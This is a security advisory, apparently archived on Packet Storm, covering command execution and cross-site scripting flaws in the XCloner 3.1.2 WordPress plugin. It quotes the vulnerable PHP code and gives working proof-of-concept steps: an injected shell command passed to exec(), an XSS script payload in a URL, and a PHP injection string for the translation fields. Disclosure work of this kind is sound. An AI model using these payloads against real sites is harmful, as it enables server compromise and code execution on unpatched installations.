Twenty Year Anniversary

WordPress XCloner 3.1.2 XSS / Command Execution

WordPress XCloner 3.1.2 XSS / Command Execution
Posted May 31, 2015
Authored by Larry W. Cashdollar

WordPress XCloner plugin version 3.1.2 suffers from command execution and cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
advisories | CVE-2015-4336, CVE-2015-4337, CVE-2015-4338
MD5 | 5d0b053dd77486b7a90024b666ebdc48

WordPress XCloner 3.1.2 XSS / Command Execution

Change Mirror Download
Title: Xloner v3.1.2 wordpress plugin authenticated command execution and XSS
Author: Larry W. Cashdollar, @_larry0
Date: 2015-05-10
Download Site: https://wordpress.org/plugins/xclonerbackupandrestore/ http://extensions.joomla.org/extensions/accessasecurity/ sitesecurity/ backup/665
Vendor: Ovidiu Liuta, @thinkovi
Vendor Notified: 0000-00-00
Vendor Contact: @thinkovi
Description: XCloner is a Backup and Restore component designed for PHP/Mysql websites, it can work as a native plugin for WordPress and Joomla!
Vulnerability:
Lines 1129 of 1135 in cloner.functions.php

1129 $excluded_cmd = "";
1130 if ($fp = @fopen($_REQUEST['
1130 if ($fp = @fopen($_REQUEST['excl_manual'], "r")) {
1131 while (!feof($fp))
1132 $excluded_cmd .= fread($fp, 1024);
1133
1134 fclose($fp);
1135 }

Line 1205:
If configured for manual mode the contents of $excluded_cmd are passed to exec();
1205 exec($_CONFIG[tarpath] . " $excluded_cmd ". $_CONFIG['tarcompress'] ."vf $backup_file update $file");
We need to supply a file with a list of commands to execute in it, we can create this via the backup comments feature. It creates a file under administrator/backups/.comments with whatever you want in it. Like ;id>/tmp/w00t;

Then change the configuration to manual backup by selecting the radio button and perform a backup.
Hit this link:
http://www.vapidlabs.internal/wpadmin/plugins.php?page=xcloner_show&option=com_cloner&task=refresh&json=0&startf=300&lines=6204&backup=backup_20150511_
2028_sqlnodrop.tar&excl_manual=/usr/share/wordpress/administrator/backups/.comments

In a shell:
$ cat /tmp/w00t
uid=33(wwwdata)
gid=33(wwwdata)
groups=33(wwwdata)

Also $excluded_cmd is XSS

http://www.vapidlabs.internal/wpadmin/plugins.php?page=xcloner_show&option=com_cloner&task=refresh&json=0&startf=800&lines=6204&backup=backup_20150511_
2028_sqlnodrop.tar&excl_manual=’><script>alert(‘w00t’);</script>

Chrome XSS alert:

The XSS Auditor refused to execute a script in
'http://www.vapidlabs.internal/wpadmin/plugins.php?page=xcloner_show&option=com_…lnodrop.tar&excl_manual=%27%3E%3Cscript%3Ealert(%27w00t%27);%3C/script%3E' because
its source code was found within the request. The auditor was enabled as the server sent
neither an 'XXSSProtection' nor 'ContentSecurityPolicy' header.
plugins.php:403 The XSS Auditor refused to execute a script in
'http://www.vapidlabs.internal/wpadmin/plugins.php?page=xcloner_show&option=com_…lno
drop.tar&excl_manual=%27%3E%3Cscript%3Ealert(%27w00t%27);%3C/script%3E' because
its source code was found within the request. The auditor was enabled as the server sent
neither an 'XXSSProtection' nor 'ContentSecurityPolicy' header.

The default template has an error with the LM_LOGIN_TEXT field so just clean that out or you’ll get a syntax error when trying to execute.
Adding foo”);phpinfo();define(“foo to the Translation LM_FRONT_* fields then browsing to language/italian.php you’ll execute phpinfo();.

CVEID: TBD
OSVDB:TBD

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

December 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    11 Files
  • 2
    Dec 2nd
    1 Files
  • 3
    Dec 3rd
    18 Files
  • 4
    Dec 4th
    40 Files
  • 5
    Dec 5th
    16 Files
  • 6
    Dec 6th
    50 Files
  • 7
    Dec 7th
    10 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close